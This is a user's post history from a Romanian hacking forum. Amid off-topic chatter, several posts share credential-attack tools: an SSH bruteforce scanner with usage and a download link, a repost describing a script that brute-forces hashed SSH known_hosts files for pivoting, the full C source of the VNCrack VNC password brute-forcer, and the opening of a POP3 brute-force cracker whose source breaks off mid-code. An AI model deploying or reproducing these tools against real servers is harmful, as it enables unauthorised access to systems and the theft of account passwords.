Jump to content

Eric

Active Members
  • Posts

    539
  • Joined

  • Last visited

  • Days Won

    4

Everything posted by Eric

  1. inafara de offtopic mai stii sa faci ceva ? daca ma uit la posturile tale toate sunt in doru lelii, incearca sa te abtii de la porcarii de genu asta ori iti place sa aduni posturi sa zica lumea ca esti important ? citeste aici si o sa intelegi Internet Protocol (IP)
  2. Scannerul nu este scris de mine si nu am nici sursa, a fost facut " la comanda " .Eu nu am gasit nimic suspect !
  3. M-am hotarat sa fac public bruteforce-ul meu pentru ssh. A fost terminat undeva in decembrie 2013, prinde foarte bine. Avantaje: 1. filtreaza busybox 2. toate cele din bash.txt sunt servere bune 3. exista session.txt , daca se restarteaza root-ul, poti porni manual din ssh2 4. daca root-ul are mai multe interfete (ip-uri) se pot pune in fisierul interfaces.txt cate un ip pe rand, asta ajuta la scanarea mai buna pentru ca se fac requesturi de pe mai multe ip 5. pscanul este facut cu multithread adica mult mai rapid decat cele publice Cum se foloseste? ./scan A ./scan B ./scan C A = range A ; ex: ./scan 70 B = range B ; ex: ./scan 70.8 C = range C ; ex: ./scan 70.6.1 In cazul in care serverul ia reboot sau se opreste scanu, pentru a il repornii ./ssh2 si cititi help-ul. download: http://bssh.comule.com/bssh.tgz Nu raspund pentru ceea ce faceti voi cu scanneru. Nu vand scannere de genul asta. Nu ma contactati pe privat.
  4. ai uitat sa precizezi cel mai important lucru, abonamentul la internet, preferabil sa fie ceva prepay. altfel iti bagi pula-n ea combinatie.
  5. Incepi cam de la 800 ron, depinde de cazino. Initial trebuie sa faci cursu de crupier care costa de la 300 euro in sus. Cei de la Marriot cred ca il au free, dar trebuie sa semnezi cu ei pe minim 1 an.
  6. Eric

    Stie cnv?

    de ce nu terminati cu offtopicu asta ? aici e market sau ce moloz e ? iar umplem 10 pagini de ce sa-i fac lu x cand il prind ?
  7. Eric

    Licenta Vbulletin

    up, inca sunt interesat!
  8. OpenSSH is a common tool for most of network and system administrators. It is used daily to open remote sessions on hosts to perform administrative tasks. But, it is also used to automate tasks between trusted hosts. Based on public/private key pairs, hosts can exchange data or execute commands via a safe (encrypted) pipe. When you ssh to a remote server, your ssh client records the hostname, IP address and public key of the remote server in a flat file called “known_hosts“. The next time you start a ssh session, the ssh client compares the server information with the one saved in the “known_hosts” file. If they differ, an error message is displayed. The primary goal of this mechanism is to block MITM (“Man-In-The-Middle“) attacks. But, this file (stored by default in your “$HOME/.ssh” directory) introduces security risks. If an attacker has access to your home directory, he will have access to the file which may contains hundreds of hosts on which you also have an access. Did you ever eared about “Island Hopping” attack? Wikipedia defines this attack as following: “In computer security, for example in intrusion detection and penetration testing, island hopping is the act of entering a secured system through a weak link and then “hopping” around on the computer nodes within the internal systems. In this field, island hopping is also known as pivoting.“ A potential worm could take advantage of the information stored in the file to spread across multiple hosts. OpenSSH introduced a countermeasure against this attack since the version 4.0. The ssh client is able to store the host information in a hash format. The old format was: host.rootshell.be,10.0.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0ei6KvTUHnmCjdsEwpCCaOHZWvjS \ jytm/5/Vv1Dc6ToaxTnqJ7ocBb7NI/HUQEc23eUYjFrZQDS0JRml3RnsG0UzvtIfAPDP1x7h6HHy4ixjAP7slXgqj3c \ fOV5ThNjYI0mEbIh1ezGWovwoy0IxRK9Lq29CacqQH8407b1jEj/zfOzUi3FgRlsKZTsc3UIoWSY0KPSSPlcSTInviG \ oNi+9gC8eqXHURsvOWyQMH5K5isvc/Wp1DiMxXSQ+uchBl6AoqSj6FTkRAQ9oAe8p1GekxuLh2PJ+dMDIuhGeZ60fIh \ eq15kzZGsDWkNF6hc/HmkJDSPn3bRmo3xmFP02sNw== With the version 4.0, hosts are stored in this new format: |1|U8gOHG/S5rH9uRH3cXgdUNF13F4=|cNimv6148Swl6QcwqBOjgRnHnKs= ssh-rsa AAAAB3NzaC1yc2EAAAABIw \ AAAQEAvAtd04lhxzzqW57464mhkubDixZpy+qxvXBVodNmbM8culkfYtmq0Ynd+1G1s3hcBSEa8XHhNdcxTx51MbIjO \ dCbFyx6rbvTIU/5T2z0/TMjeQyL3SZttbYWM2U0agKp/86FdaQF6V87loNcDq/26JLBSaZgViZS4gKZbflZCdD6aB2s \ 2sqEV4k7zU2OMHPy7W6ghNQzEu+Ep/44w4RCdI5OYFfids9B0JSUefR9eiumjRwyI0dCPyq9jrQZy47AI7oiQJqSjvu \ eMIwZrrlmECYSvOru0MiyeKwsm7m8dyzAE+f2CkdUh6tQleLRLnEMH+25EAB56AhkpWSuMPJX1w== As you can see, the hostname is not readable anymore. To achieve this result, a new configuration directive has been added in version 4.0 and above: “HashKnownHosts [Yes|No]“. Note that this feature is not enabled by default. Some Linux (or other UNIX flavors) enable it by default. Check your configuration. If you switch the hashing feature on, do not forget to hash your existing known_hosts file: $ ssh-keygen -H -f $HOME/.ssh/known_hosts Hashing ssh keys is definitively the right way to go but introduce problems. First, the good guys cannot easily manage their SSH hosts! How to perform a cleanup? (My “known_hosts” file has 239 entries!). In case of security incident management or forensics investigations, it can be useful to know the list of hosts where the user connected. It’s also an issue for pentesters. If you have access to a file containing hashed SSH hosts, it can be interesting to discover the hostnames or IP addresses and use the server to “jump” to another target. Remember: people are weak and re-use the same passwords on multiple servers. By looking into the OpenSSH client source code (more precisely in “hostfile.c“), I found how are hashed the hostnames. Here is an example: |1|U8gOHG/S5rH9uRH3cXgdUNF13F4=|cNimv6148Swl6QcwqBOjgRnHnKs= “|1|” is the HASH_MAGIC. The first part between the separators “|” is the salt encoded in Base64. When a new host is added, the salt is generated randomly. The second one is the hostname HMAC (“Hash-based Message Authentication Code“) generated via SHA1 using the decoded salt and then encoded in Base64. Once the hashing performed, it’s not possible to decode it. Like UNIX passwords, the only way to find back a hostname is to apply the same hash function and compare the results. I wrote a Perl script to bruteforce the “known_hosts” file. It generates hostnames or IP addresses, hash them and compare the results with the information stored in the SSH file. The script syntax is: ./known_hosts_bruteforcer.pl -h Usage: known_hosts_bruteforcer.pl [options] -d <domain> Specify a domain name to append to hostnames (default: none) -f <file> Specify the known_hosts file to bruteforce (default: /.ssh/known_hosts) -i Bruteforce IP addresses (default: hostnames) -l <integer> Specify the hostname maximum length (default: 8 ) -s <string> Specify an initial IP address or password (default: none) -v Verbose output -h Print this help, then exit Without arguments, the script will bruteforce your $HOME/.ssh/known_hosts by generating hostnames with a maximum length of 8 characters. If a match is found, the hostname is displayed with the corresponding line in the file. If your hosts are FQDN, a domain can be specify using the flag “-d“. It will be automatically appended to all generated hostnames. By using the “-i” flag, the script generates IP addresses instead of hostnames. To spread the log across multiple computers or if you know the first letters of the used hostnames or the first bytes of the IP addresses, you can specify an initial value with the “-s” flag. Examples: If your server names are based on the template “srvxxx” and belongs to the rootshell.be domain, use the following syntax: ./known_hosts_bruteforcer.pl -d rootshell.be -s srv000 If your DMZ uses IP addresses in the range 192.168.0.0/24, use the following syntax: ./known_hosts_bruteforcer.pl -i -s 192.168.0.0 When hosts are found, there are displayed as below: $ ./known_hosts_bruteforcer.pl -i -s 10.255.0.0 *** Found host: 10.255.1.17 (line 31) *** *** Found host: 10.255.1.74 (line 165) *** *** Found host: 10.255.1.75 (line 69) *** *** Found host: 10.255.1.76 (line 28) *** *** Found host: 10.255.1.78 (line 56) *** *** Found host: 10.255.1.91 (line 51) *** ^C My first idea was to bruteforce using a dictionary. Unfortunately, hostnames are sometimes based on templates like “svr000” or “dmzsrv-000” which make the dictionary unreliable. And about the performance? I’m not a developer and my code could for sure be optimized. The performance is directly related to the size of your “known_hosts” file. Be patient! Usual disclaimer: this code is provided “as is” without any warranty or support. It is provided for educational or personal use only. I’ll not be held responsible for any illegal activity performed with this code. Download: http://blog.rootshell.be/wp-content/uploads/2010/11/known_hosts_bruteforcer.pl.txt Source: Bruteforcing SSH Known_Hosts Files | /dev/random
  9. SSHTunnel is a SSH tunnel app for Android System, based on Connectbot and Dropbear / OpenSSH (Beta Branch). With this app and a configured server (typically configured with sshd and nginx / squid), you can easily browse internet through a SSH tunnel on your android devices. SSHTunnel is using redsocks (redsocks - transparent socks redirector) to redirect all traffic on Android. You can check out its source codes from: https://github.com/darkk/redsocks Currently, the latest sshtunnel source codes can be found here: https://bitbucket.org/madeye/sshtunnel and the latest sshtunnel-beta can be found here: https://github.com/madeye/sshtunnel-beta Notice If you want to set up your own VPS to work with this app, please install and configure HTTP PROXY on your VPS first (typically squid or nginx). To support HTTPS (SSL), you must configure your http proxy to allow CONNECT Method on 443 port Considering the poor performance of dynamic port forwarding on most android devices, we suggest you to use a transparent proxy set up in the SSH server and use local port forward to proxy data through SSH tunnel. To work with your private/public key, please store your key (only OpenSSH format, not putty) as the file /sdcard/sshtunnel/key IMPORTANT : This App uses a DNS Proxy to solve the DNS Pollution problem in China, which would try to fetch pre-defined HOSTS information from our web server. All these HOSTS files and source codes are open to public. Download: https://code.google.com/p/sshtunnel/downloads/list
  10. incearca sa dai wget intr-un server, apoi tar xvf la arhiva .jpg .... @ Cartus_C - felicitari ai facut public un scanner din 2007-2008 si este peste tot, a mai fost postat de nenumarate ori. @ tex - explica si cum ai luat link-u respectiv adica: - copy link location pe download - wget -O scan.tar url Nu este obligatoriu sa treci user agent-ul.
  11. Cumpar licenta vbulletin. Astept oferte si preturi. Multumesc.
  12. ma fac ungur, eric unguru ! ma cac in el de subiect
  13. Eric

    ip check tool

    IP check tool - retrieve information about an ip
  14. Conteaza foarte mult cum verificati voi ip-urile alea. Eu va recomand maxmind, chiar si .dat-urile free sunt ok pentru ce va trebuie voua. ex: IP check tool - retrieve information about an ip lucram la el de ceva timp info-urile sunt luate din dat-urile de la maxmind, ce-i drept versiunile full costa ceva.
  15. inca 5 ca asta si poti posta la market. close !
  16. Daca ii blochezi regulile timp de x secunde / minute la inregistrare tot nu faci nimic, ca le lasa deschise se revine peste x timp, apoi da next, cel mai ok ca sa le parcurga e sa ii pui regulamentul foarte clar la dispozitie apoi sa il pui sa raspunda la 3 intrebari random. Cum ar fi: De cate posturi DE CALITATE ai nevoie pentru a posta in categoria X, Y, Z Ce trebuie sa faci daca .... Ce nu trebuie sa faci daca ....
  17. Mai bine ii dai link la inregistrare cu regulile apoi in loc de captcha il pui sa raspuna da 3 intrebari din regulament, asa sti ca le-a citit.
  18. de cand se scot gazele natrale din pamant cu cianura ? adica ca sa scot un gaz bag cianura ? aia nu se folosea decat la aur ? sau care-i explicatia cu cianura si gazele de sist ? nu ca as fi de acord cu exploatarea gazelor de altii dar poza aia mi se pare mult prea exagerata. adica dupa exploatare daca ma duc in vizita la rudele din satul cu pricina o sa am un ochi albastru ? oare ce super puteri o sa mai capat ?
  19. debian, ubuntu, centos... cam asta e ordinea. prefer ubuntu pentru chestii rapide, facute la click fara batai de cap.
  20. e strict educativ.
  21. Download vncrack.tar.gz from Sendspace.com - send big files the easy way /* Project code: vncrack * * FX <fx@phenoelit.de> * Phenoelit (http://www.phenoelit.de/) * (c) 2k * * Block sleep idea by Stonneway. * * $Id: vncrack.c,v 1.17 2001/06/23 16:33:41 fx Exp fx $ */ #include <stdio.h> #include <string.h> #include <syslog.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <unistd.h> #include <sys/time.h> #include <signal.h> #include "d3des.h" /* defs out of libvncauth */ extern unsigned char fixedkey[8]; int vncEncryptAndStorePasswd(char *passwd, char *fname); char *vncDecryptPasswdFromFile(char *fname); void vncEncryptBytes(unsigned char *bytes, char *passwd); #define SPLASH "VNCrack - by Phenoelit (http://www.phenoelit.de/)\n$Revision: 1.17 $\n" int verbose=0,lbf=0; char *schallange=NULL, *sresponse=NULL; void interactive(void); void cr_crack(char *wordlist); void *sec_malloc(size_t size) { void *p; if ((p=malloc(size))==NULL) { fprintf(stderr,"malloc() failed for %d bytes\n",size); exit (-1); } memset(p,0,size); return p; } void usage(void) { printf("VNCrack\n" "$Id: vncrack.c,v 1.17 2001/06/23 16:33:41 fx Exp fx $\n" "by Phenoelit (http://www.phenoelit.de/)\n\n"\ "Usage:\n" "Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]\n" "Passwd: ./vncrack -C /home/some/user/.vnc/passwd\n" "Windows interactive mode: ./vncrack -W \n" "\tenter hex key one byte per line - find it in\n" "\t\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\n" "\t\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\Password\n\n" "Options for online mode:\n" "-v\tverbose\n" "-d N\tSleep N nanoseconds between each try\n" "-D N\tSleep N seconds between each try\n" "-a\tJust a funny thing\n" "-p P\tconnect to port P instead of 5900\n" "-s N\tSleep N seconds in case connect() failed\n" "Options for PHoss intercepted challages:\n" "-c <challange>\tchallange from PHoss output\n" "-r <response>\tresponse from PHoss output\n" ); exit(-1); } int main(int argc, char **argv) { int sfd; /* socket */ struct hostent *dest; struct sockaddr_in dest_addr; // char *sbuf; char *rbuf; unsigned char atype[4]; unsigned char challange[16]; char *vnchost=NULL; int vncport=5900; extern char *optarg; int option; int i,ani=0; char *wordlist=NULL; FILE *fd; char *tryword; struct timespec ts={0,0}; int conwait=90; int redocount=0; int redosleep=12; char servertext[256]; char *sthelp; while ((option=getopt(argc,argv,"avWp:h:w:C:d:D:s:c:r:R:"))!=EOF) { switch (option) { case 'v': /*verbose*/ verbose++; break; case 'a': /* animation shit */ ani=1; break; case 'p': /* port def */ if ((vncport=atoi(optarg))==0) { fprintf(stderr,"wrong port number: %s\n",optarg); exit(-1); } break; case 'h': /* hostname */ vnchost=(char *)sec_malloc(strlen(optarg)+1); strcpy(vnchost,optarg); break; case 'w': /* wordlist file */ wordlist=(char *)sec_malloc(strlen(optarg)+1); strcpy(wordlist,optarg); break; case 'd': if ((ts.tv_nsec=atol(optarg))==0) { fprintf(stderr,"Delay of 0 ?\n"); exit(-1); } break; case 'D': if ((ts.tv_sec=atoi(optarg))==0) { fprintf(stderr,"Delay of 0 ?\n"); exit(-1); } break; case 's': /* for the 'cannot assign req. addr' stuff */ conwait=atoi(optarg); break; case 'C': /* VNC passwd file */ /* if the user just requests file decryption - here we go */ printf("VNC password: %s\n", vncDecryptPasswdFromFile(optarg)); exit(0); break; /* not reached */ case 'W': /* going interactive */ interactive(); break; /* not reached */ case 'c': /* challange */ schallange=(char *)sec_malloc(strlen(optarg)+1); strcpy(schallange,optarg); break; case 'r': /* challange */ sresponse=(char *)sec_malloc(strlen(optarg)+1); strcpy(sresponse,optarg); break; case 'R': /* redo sleep */ redosleep=atoi(optarg); break; default: usage(); } } if (verbose) ani=0; if (schallange||sresponse) { printf(SPLASH); cr_crack(wordlist); /* exit is done here */ } if (!(vnchost&&vncport&&wordlist)) usage(); printf(SPLASH); /* resolve host */ if ((dest=gethostbyname(vnchost))==NULL) { syslog(LOG_ERR,"unable to resolve host %s", vnchost); exit (-1); } dest_addr.sin_family=AF_INET; dest_addr.sin_port=htons(vncport); bcopy(dest->h_addr,(char *)&dest_addr.sin_addr,dest->h_length); bzero(&(dest_addr.sin_zero),8); if ((fd=fopen(wordlist,"rt"))==NULL) { fprintf(stderr,"Unable to open wordlist %s\n",wordlist); exit (-1); } tryword=sec_malloc(256); while (fgets(tryword,255,fd)!=NULL) { /* cut the word */ /* if (strlen(tryword)>8) tryword[8]='\0'; */ if (tryword[strlen(tryword)-1]=='\n') tryword[strlen(tryword)-1]='\0'; ReDoClosed: if (verbose) { printf("trying '%s' ...",tryword); fflush(stdout); } if ((sfd=socket(AF_INET,SOCK_STREAM,0))==0) { perror("socket()"); fprintf(stderr,"Sleeping for %d seconds before retry...\n",conwait); sleep(conwait); if ((sfd=socket(AF_INET,SOCK_STREAM,0))==0) { perror("socket()"); fprintf(stderr,"Giving up!\n"); exit (-1); } } if (connect(sfd,(struct sockaddr *)&dest_addr,sizeof(dest_addr))<0) { perror("connect()"); fprintf(stderr,"Sleeping for %d seconds before retry...\n",conwait); close(sfd); sleep(conwait); if ((sfd=socket(AF_INET,SOCK_STREAM,0))==0) { perror("socket()"); exit(-1); } if (connect(sfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr))<0) { perror("connect()"); fprintf(stderr,"Giving up!\n"); exit(-1); } } /* connunication starts with server->client version packet */ rbuf=sec_malloc(100); if (recv(sfd,rbuf,100,0)<0) { perror("recv()"); exit(-1); } if (verbose>1) printf("\nServer Protocol version: %s\n",rbuf); /* bounce this message back - so the server will continue */ if (send(sfd,rbuf,strlen(rbuf),0)<0) { perror("send()"); exit(-1); } if (recv(sfd,atype,sizeof(atype),0)<0) { perror("atype recv()"); exit(-1); } if (verbose>1) { printf("Authentication type: "); for (i=0;i<4;i++) { printf("%x ",atype[i]); } printf("\n"); } switch (atype[3]) { case 0: fprintf(stderr,"Server told me: connection close\n"); /* get more info */ if (verbose) { memset(servertext,0,sizeof(servertext)); if (recv(sfd,servertext,sizeof(servertext),0)<0) { fprintf(stderr,"recv() in verbose"); exit(-1); } else { sthelp=(char *)servertext; sthelp+=4; fprintf(stderr,"Server says: %s\n",sthelp); } printf("\tWaiting for blocking disable\n"); } sleep(redosleep); if ((redocount++)<3) { goto ReDoClosed; } else { fprintf(stderr,"\tgiving up (increase -R)\n"); } exit(-1); break; /* not reached */ case 1: printf( "\n>>>>>>>>>>>>>>>\n" "Server does not require authentication!\n" ">>>>>>>>>>>>>>>\n"); exit(-1); break; /* not reached */ case 2: if (verbose>1) printf( "Authentication type " "'VNC authentication' - fine\n"); break; default: fprintf(stderr,"Unknown authentication requested" "by server\n"); exit(-1); } redocount=0; if (recv(sfd,challange,sizeof(challange),0)<0) { perror("challange recv()"); exit(-1); } if (verbose>1) { printf("challange: "); for (i=0;i<16;i++) { printf("%x ",challange[i]); } printf("\n"); } /* encrypt challange with password and send this fuck to the server */ vncEncryptBytes(challange,tryword); if (send(sfd,challange,sizeof(challange),0)<0) { perror("authentication send()"); exit(-1); } atype[3]=0; if (recv(sfd,atype,sizeof(atype),0)<0) { perror("auth response recv()"); exit(-1); } switch (atype[3]) { case 0: printf( "\n>>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n",tryword); free(tryword); exit(0); break; /* not reached */ case 1: /* 'normal' failed */ if (verbose) printf("failed\n"); break; case 2: /* too many */ printf("Server is angry, waiting 2 minutes " "for calm down...\n"); sleep(120); break; default: fprintf(stderr,"Unknown response\n"); exit(-1); } shutdown(sfd,2); close(sfd); memset(tryword,0,256); if (ani) { switch (ani) { case 1: printf("\b|"); break; case 2: printf("\b/"); break; case 3: printf("\b-"); break; case 4: printf("\b\\"); ani=0; break; } ani++; fflush(stdout); } if (ts.tv_nsec||ts.tv_sec) { nanosleep(&ts,NULL); } } free(tryword); fclose(fd); return 0; } void interactive(void) { unsigned char *pass; int i; char c; pass=(char *)sec_malloc(9); for (i=0;i<8;i++) { scanf("%x",&c); pass[i]=c; } printf("Entered HEX String: "); for (i=0;i<8;i++) { printf("%x ",pass[i]); } printf("\n"); deskey(fixedkey,DE1); des(pass,pass); printf("VNC Password: %s\n",pass); exit(0); } void cr_crack(char *wordlist) { int i,j; #define CRL 16 char chl[CRL+1]; char rsp[CRL+1]; char tchl[CRL+1]; char ts[3]; FILE *fd; char *tryword; char bft[9]; /* char cset1[] = "abcdefghijklmnopqrstuvwxyz" "ABCDEFGHIJKLMNOPQRSTUVWXYZ" "1234567890\0";*/ char cset1[] = "abcdefghijklmnopqrstuvwxyz" "ABCDEFGHIJKLMNOPQRSTUVWXYZ" "1234567890!\"$%&/()=?`''*_:;-.,#+}][{^<>¦\0"; #define cset1_len (92) int cnt[8]; time_t t1,t2; if ((!schallange)||(!sresponse)) { usage(); } if ( (strlen(schallange)!=16*2) ||(strlen(sresponse)!=16*2) ) { fprintf(stderr, "challange and response have to be 32 characters each\n"); exit (-1); } memset(&chl,0,CRL+1); memset(&tchl,0,CRL+1); memset(&rsp,0,CRL+1); memset(&ts,0,3); j=0; for (i=0;i<CRL;i++) { strncpy(ts,&schallange[j],2); chl[i]=(unsigned char)strtol(ts,NULL,16); strncpy(ts,&sresponse[j],2); rsp[i]=(unsigned char)strtol(ts,NULL,16); j+=2; } if (verbose) { printf("Challange: "); for (i=0;i<CRL;i++) { printf("%x",(unsigned char) chl[i]); } printf("\n"); printf("Response : "); for (i=0;i<CRL;i++) { printf("%x",(unsigned char) rsp[i]); } printf("\n"); } if ((fd=fopen(wordlist,"rt"))==NULL) { fprintf(stderr,"Could not open wordlist\n"); exit (-1); } tryword=sec_malloc(256); while (fgets(tryword,255,fd)!=NULL) { tryword[strlen(tryword)-1]='\0'; /* try this word */ memcpy(tchl,chl,CRL); vncEncryptBytes(tchl,tryword); if (verbose>1) { for (i=0;i<CRL;i++) { printf("%x",(unsigned char) rsp[i]); } printf("\n"); for (i=0;i<CRL;i++) { printf("%x",(unsigned char) tchl[i]); } printf("\n"); } if (!memcmp(tchl,rsp,CRL)) { printf( "\n>>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n",tryword); free(tryword); exit(0); } else { if (verbose) printf("%s failed\n",tryword); } memset(tryword,0,256); } fclose(fd); free(tryword); printf( "-----------------------------------\n" "Wordlist failed - going brute force\n" "-----------------------------------\n" ); bft[8]='\0'; bft[1]='\0'; printf("\tdepth I\n"); for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) { bft[0]=cset1[cnt[0]]; if (verbose) printf("try: %s\n",bft); memcpy(tchl,chl,CRL); vncEncryptBytes(tchl,bft); if (!memcmp(tchl,rsp,16)) { printf( "\n>>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 bft[2]='\0'; printf("\tdepth II\n"); for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) { bft[1]=cset1[cnt[1]]; for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) { bft[0]=cset1[cnt[0]]; if (verbose) printf("try: %s\n",bft); memcpy(tchl,chl,CRL); vncEncryptBytes(tchl,bft); if (!memcmp(tchl,rsp,16)) { printf( "\n>>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 /************/ bft[3]='\0'; printf("\tdepth III\n"); for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) { bft[2]=cset1[cnt[2]]; for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) { bft[1]=cset1[cnt[1]]; for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) { bft[0]=cset1[cnt[0]]; if (verbose) printf("try: %s\n",bft); memcpy(tchl,chl,CRL); vncEncryptBytes(tchl,bft); if (!memcmp(tchl,rsp,16)) { printf( "\n>>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 /************/ bft[4]='\0'; printf("\tdepth IV\n"); for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) { bft[3]=cset1[cnt[3]]; for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) { bft[2]=cset1[cnt[2]]; for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) { bft[1]=cset1[cnt[1]]; for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) { bft[0]=cset1[cnt[0]]; if (verbose) printf("try: %s\n",bft); memcpy(tchl,chl,CRL); vncEncryptBytes(tchl,bft); if (!memcmp(tchl,rsp,16)) { printf( "\n>>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 } //3 /************/ bft[5]='\0'; printf("\tdepth V\n"); for (cnt[4]=0;cnt[4]<cset1_len;cnt[4]++) { bft[4]=cset1[cnt[4]]; for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) { bft[3]=cset1[cnt[3]]; for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) { bft[2]=cset1[cnt[2]]; for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) { bft[1]=cset1[cnt[1]]; for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) { bft[0]=cset1[cnt[0]]; if (verbose) printf("try: %s\n",bft); memcpy(tchl,chl,CRL); vncEncryptBytes(tchl,bft); if (!memcmp(tchl,rsp,16)) { printf( "\n>>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 } //3 } //4 /************/ bft[6]='\0'; printf("\tdepth VI\n"); for (cnt[5]=0;cnt[5]<cset1_len;cnt[5]++) { bft[5]=cset1[cnt[5]]; for (cnt[4]=0;cnt[4]<cset1_len;cnt[4]++) { bft[4]=cset1[cnt[4]]; for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) { bft[3]=cset1[cnt[3]]; for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) { bft[2]=cset1[cnt[2]]; for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) { bft[1]=cset1[cnt[1]]; for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) { bft[0]=cset1[cnt[0]]; if (verbose) printf("try: %s\n",bft); memcpy(tchl,chl,CRL); vncEncryptBytes(tchl,bft); if (!memcmp(tchl,rsp,16)) { printf( "\n>>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 } //3 } //4 } //5 /************/ bft[7]='\0'; printf("\tdepth VII\n"); for (cnt[6]=0;cnt[6]<cset1_len;cnt[6]++) { bft[6]=cset1[cnt[6]]; for (cnt[5]=0;cnt[5]<cset1_len;cnt[5]++) { bft[5]=cset1[cnt[5]]; for (cnt[4]=0;cnt[4]<cset1_len;cnt[4]++) { bft[4]=cset1[cnt[4]]; for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) { bft[3]=cset1[cnt[3]]; for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) { bft[2]=cset1[cnt[2]]; for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) { bft[1]=cset1[cnt[1]]; for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) { bft[0]=cset1[cnt[0]]; if (verbose) printf("try: %s\n",bft); memcpy(tchl,chl,CRL); vncEncryptBytes(tchl,bft); if (!memcmp(tchl,rsp,16)) { printf( "\n>>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 } //3 } //4 } //5 } //6 /************/ bft[8]='\0'; printf("\tdepth VIII\n"); for (cnt[7]=0;cnt[7]<cset1_len;cnt[7]++) { bft[7]=cset1[cnt[7]]; for (cnt[6]=0;cnt[6]<cset1_len;cnt[6]++) { bft[6]=cset1[cnt[6]]; for (cnt[5]=0;cnt[5]<cset1_len;cnt[5]++) { bft[5]=cset1[cnt[5]]; for (cnt[4]=0;cnt[4]<cset1_len;cnt[4]++) { bft[4]=cset1[cnt[4]]; for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) { bft[3]=cset1[cnt[3]]; for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) { bft[2]=cset1[cnt[2]]; for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) { bft[1]=cset1[cnt[1]]; for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) { bft[0]=cset1[cnt[0]]; if (verbose) printf("try: %s\n",bft); memcpy(tchl,chl,CRL); vncEncryptBytes(tchl,bft); if (!memcmp(tchl,rsp,16)) { printf( "\n>>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 } //3 } //4 } //5 } //6 } //7 t2=time(NULL); printf("depth VIII (%20.4f wps)\n",(t2-t1)/63); printf("Not in character set !\n"); exit(0); }
  22. [C] rstforums.com - pop3 bruteforce - Pastebin.com /* * popcrack, POP3 bruteforce cracker * * If you don't want to waste any clock ticks, compile with -DNOBENCHMARK * On Windows compile with -DWINDOWS (migh only work with Cygnus Cygwin) * To see what is being sent/received, compile with -DDEBUG * * Usage: popcrack <wordlist> <username> <host> [port] * * Current benchmarks (quickest speeds attained): * p250 MMX with cable modem: 2000 passwords/min * dual p100 on T3: 1325 passwords/min * p133 at < 21k: 250 passwords/min * * [both network speed and processor speed play equal roles] * [also compiling with -DNOBENCHMARK should improve speed] */ #include <stdio.h> #include <errno.h> #include <string.h> #ifndef WINDOWS #include <unistd.h> #include <netdb.h> #endif #ifndef NOBENCHMARK # include <time.h> # include <signal.h> #endif #ifdef WINDOWS # include <windows.h> # include <winsock.h> #else # include <netinet/in.h> # include <sys/socket.h> # include <arpa/inet.h> #endif /* ---------------------------------------------- */ #ifndef WINDOWS # define SOCKET_ERROR -1 # define INVALID_SOCKET -1 # define closesocket(sock) close(sock) # define WSACleanup() ; #endif /* ---------------------------------------------- */ #define NUMSOCKS 1 #define PORT 110 #define ERRORLOG "error.log" #define SUCCESSLOG "success.log" #define COMPLETELOG "complete.log" #define PASSLEN 16 #define BUFSIZE 128 /* ---------------------------------------------- */ #ifndef WINDOWS typedef int SOCKET; typedef struct sockaddr SOCKADDR; typedef struct sockaddr_in SOCKADDR_IN; #endif double numkeys = 0; #ifndef NOBENCHMARK double minkeys; #ifdef WINDOWS unsigned int alarm(unsigned int); #endif void calckeys(int sig) { minkeys = numkeys; } #endif int main(int argc, char **argv) { #ifdef WINDOWS WSADATA wsaData; #endif FILE *file; register char *ptr; int port = PORT; char *user, *host; struct hostent *he; SOCKET sockfd; SOCKADDR_IN srcin, dstin; #ifndef NOBENCHMARK struct tm *tm; char timebuf[16]; time_t time1, time2; clock_t cracktime; clock_t beginpass, 